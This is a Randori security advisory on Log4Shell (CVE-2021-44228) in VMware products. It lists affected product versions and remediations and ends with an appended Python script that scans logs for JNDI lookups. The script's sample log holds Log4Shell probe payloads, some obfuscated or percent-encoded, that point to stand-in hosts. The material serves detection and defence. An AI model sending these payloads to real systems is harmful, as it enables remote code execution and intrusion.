
December 11, 2021

VMSA-2021-0028: VMware Log4Shell Impact & Remediations

By: Randori Attack Team


Last Update: 9:48 am EDT, Jan. 10, 2022

  • Added new knowledgebase articles for several VMware products detailing mitigations
  • Added workaround for VMware vRealize Automation, VMware Workspace ONE Access Connector (VMware Identity Manager Connector), VMware vRealize Orchestrator, VMware AppDefense Appliance, VMware Cloud Director Object Storage Extension, VMware vRealize Log Insight, VMware AppDefense Appliance, VMware Cloud Director Object Storage Extension v2.0.x, VMware vRealize Log Insight, VMware Tanzu Scheduler, VMware Smart Assurance NCM, VMware Smart Assurance SAM [Service Assurance Manager], VMware Integrated OpenStack, VMware vRealize Business for Cloud, VMware vRealize Network Insight
  • Updated list of impacted applications
  • Corrected VMware Tanzu GemFire entry
  • Added mitigation for VMware HCX
  • Added mitigations for VMware Cloud Provider Lifecycle Manager, VMware SD-WAN VCO, VMware NSX-T Intelligence Appliance, VMware Horizon Agents Installer, VMware Tanzu Observability Proxy, VMware Smart Assurance M&R, VMware Harbor Container Registry for TKGI, VMware vRealize Operations Tenant App for VMware Cloud Director

Situation Report: VMSA-2021-0028

A high severity vulnerability (CVE-2021-44228) impacting multiple versions of the Apache Log4j 2 utility was disclosed publicly via the project’s GitHub on December 9, 2021. This vulnerability impacts multiple VMware products. VMware has assigned VMSA-2021-0028 to this issue and has begun to release mitigations. The Randori Attack Team can confirm exploitability of VMware products in live environments (VMSA-2021-0028) via Log4j (CVE-2021-44228), aka “Log4Shell”. Randori has been in contact with VMware and is providing relevant information to their teams, but will not release proof-of-concept code.

This is a critical vulnerability and impacted organizations should take immediate action. This post will be regularly updated, but follow @RandoriAttack for immediate updates. 

Impact

The Log4j 2 library is very frequently used in enterprise Java software. As with other high-profile vulnerabilities such as Heartbleed and Shellshock, we believe an increasing number of vulnerable products will be discovered in the weeks to come. Randori has validated exploitability with a working exploit and anticipates widespread exploitation by threat actors imminently. Randori has been in contact with the VMware team to assist their development of mitigations.

Impacted products:

  • VMware Horizon (8.x, 7.x)
  • VMware vCenter Server (7.x, 6.5.x, 6.7.x)
  • VMware HCX (4.1, 4.2, 4.0, 3.x)
  • VMware NSX-T Data Center (3.x, 2.x)
  • VMware Unified Access Gateway (21.x, 20.x, 3.x)
  • VMware Workspace ONE Access (21.x, 20.x)
  • VMware Identity Manager (3.x)
  • VMware vRealize Operations (8.x)
  • VMware vRealize Operations Cloud Proxy (Any)
  • VMware vRealize Log Insight (8.x)
  • VMware vRealize Automation (8.x, 7.6)
  • VMware Telco Cloud Automation (2.x, 1.x)
  • VMware Carbon Black Cloud Workload Appliance (1.x)
  • VMware Site Recovery Manager (8.x)
  • VMware Tanzu GemFire (1.14.x, 1.13.x, 1.10.x)
  • VMware Tanzu Greenplum (6.x)
  • VMware Tanzu Operations Manager (2.x)
  • VMware Tanzu Application Service for VMs (2.x)
  • VMware Tanzu Kubernetes Grid Integrated Edition (1.x)
  • VMware Tanzu Observability by Wavefront Nozzle (3.x, 2.x)
  • Healthwatch for Tanzu Application Service (2.x, 1.x)
  • Spring Cloud Services for VMware Tanzu (3.x)
  • Spring Cloud Gateway for VMware Tanzu (1.x)
  • Spring Cloud Gateway for Kubernetes (1.x)
  • API Portal for VMware Tanzu (1.x)
  • Single Sign-On for VMware Tanzu Application Service (1.x)
  • App Metrics (2.x)
  • VMware vCenter Cloud Gateway (1.x)
  • VMware Tanzu SQL with MySQL for VMs (1.x, 2.x)
  • vRealize Orchestrator (7.6, 8.x)
  • VMware Cloud Foundation (4.x, 3.x)
  • VMware Workspace ONE Access Connector (21.x, 20.10.x, 19.03.0.1)
  • VMware Horizon DaaS (9.1.x, 9.0.x)
  • VMware Horizon Cloud Connector (1.x, 2.x)
  • VMware NSX Data Center for vSphere (6.x)
  • VMware AppDefense Appliance (2.x)
  • VMware Cloud Director Object Storage Extension (2.1.x, 2.0.x)
  • VMware Telco Cloud Operations (1.x)
  • VMware vRealize Log Insight (8.2, 8.3, 8.4, 8.6)
  • VMware Tanzu Scheduler (1.x)
  • VMware Smart Assurance NCM (10.1.6)
  • VMware Smart Assurance SAM [Service Assurance Manager] (10.1.2, 10.1.5)
  • VMware Integrated OpenStack (7.x)
  • VMware vRealize Business for Cloud (7.x)
  • VMware vRealize Network Insight (5.3, 6.x)
  • VMware Cloud Provider Lifecycle Manager (1.x)
  • VMware SD-WAN VCO (4.x)
  • VMware NSX-T Intelligence Appliance (1.2.x, 1.1.x)
  • VMware Horizon Agents Installer (21.x.x, 20.x.x)
  • VMware Tanzu Observability Proxy (10.x)
  • VMware Smart Assurance M&R (6.8u5, 7.0u8, 7.2.0.1)
  • VMware Harbor Container Registry for TKGI (2.x)
  • VMware vRealize Operations Tenant App for VMware Cloud Director (2.5)

Remediations & Recommendations

Organizations running a VMware product impacted by VMSA-2021-0028 should take immediate action. Randori recommends the following:

  • Assume compromise and review logs for signs of malicious activity.
  • Configure firewalls to block outbound connections from affected systems.
  • Review VMSA-2021-0028 for mitigations and the release of patches.
  • Monitor our Log4Shell Attacker Note for the impact of Log4Shell beyond VMware.
  • Follow @RandoriAttack and @VMWareSRC for updates.

Links to product-specific mitigations below (last update 4:09 pm ET, Jan. 7, 2022):

If anomalies are found, we encourage you to assume this is an active incident, that you have been compromised and respond accordingly. 
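The first recommendation above, reviewing logs for signs of malicious activity, is easier to act on with a concrete check. The following Python script is an added example, not code from Randori or VMware: it scans web-server access log lines for Log4j 2 lookup strings that resolve to a JNDI reference, including the percent-encoded and nested-lookup forms (`${lower:...}`, `${...:-default}`) that simple `grep jndi` searches miss. The log lines are constructed for this example and use documentation IP ranges; the lookup resolver is an approximation of Log4j's substitution rules that is sufficient for detection, not a reimplementation of the library.

```python
"""Detect Log4Shell-style JNDI lookup strings in log lines (added example)."""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Log4j 2 lookup syntax is ${name:argument}. Obfuscated probes nest lookups such
# as ${lower:j} or ${::-j} so the raw text never contains the substring "jndi".
# This matches only lookups whose body contains no further braces (innermost).
_LOOKUP = re.compile(r"\$\{([^{}]*)\}")

# A resolved lookup that hands a URL to JNDI. Scheme list is deliberately wide.
_JNDI = re.compile(r"jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|nis|http)\s*:", re.IGNORECASE)


def _resolve_lookup(body: str) -> str:
    """Approximate what Log4j would substitute for one innermost lookup body.

    Only the forms that matter for detection are handled:
      'lower:X' / 'upper:X'  -> case-changed X
      'anything:-default'    -> the default value (so '::-j' -> 'j')
      anything else          -> the body itself, braces removed
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if sep and prefix.lower() == "lower":
        return arg.lower()
    if sep and prefix.lower() == "upper":
        return arg.upper()
    return body


def normalize(line: str, max_rounds: int = 10) -> str:
    """Collapse nested ${...} lookups from the inside out.

    '${${lower:j}ndi:ldap://x}' -> '${jndi:ldap://x}' -> 'jndi:ldap://x'.
    max_rounds bounds the work on pathological input.
    """
    for _ in range(max_rounds):
        new = _LOOKUP.sub(lambda m: _resolve_lookup(m.group(1)), line)
        if new == line:
            break
        line = new
    return line


def find_jndi(line: str) -> Optional[str]:
    """Return the JNDI URL scheme found in a log line, or None if clean."""
    decoded = line
    for _ in range(2):  # handle single and double percent-encoding
        once = unquote(decoded)
        if once == decoded:
            break
        decoded = once
    match = _JNDI.search(normalize(decoded))
    return match.group(1).lower() if match else None


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, scheme) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        scheme = find_jndi(line)
        if scheme:
            hits.append((number, scheme))
    return hits


# Constructed sample access log: one benign request, three probe variants
# (plain, nested-lookup obfuscation, percent-encoded in the query string),
# and a benign line that contains a non-JNDI lookup.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:11 +0000] "GET /login HTTP/1.1" 302 0 "-" "${${lower:j}ndi:${lower:r}mi://198.51.100.7/b}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:12 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fexample.invalid%7D HTTP/1.1" 200 12 "-" "curl/7.68"',
    '10.0.0.3 - - [10/Dec/2021:03:14:13 +0000] "GET /docs/log4j ${env:HOME} HTTP/1.1" 200 12 "-" "-"',
]

if __name__ == "__main__":
    for number, scheme in scan_log(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {scheme}")
```

Any hit is a reason to treat the host as compromised until proven otherwise, per the guidance above; the source address and timestamp of the line, together with egress logs for the same window, are the first pivot. Run it over every log the affected product writes, not only the front-end access log, because the vulnerable lookup fires wherever the string is logged.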
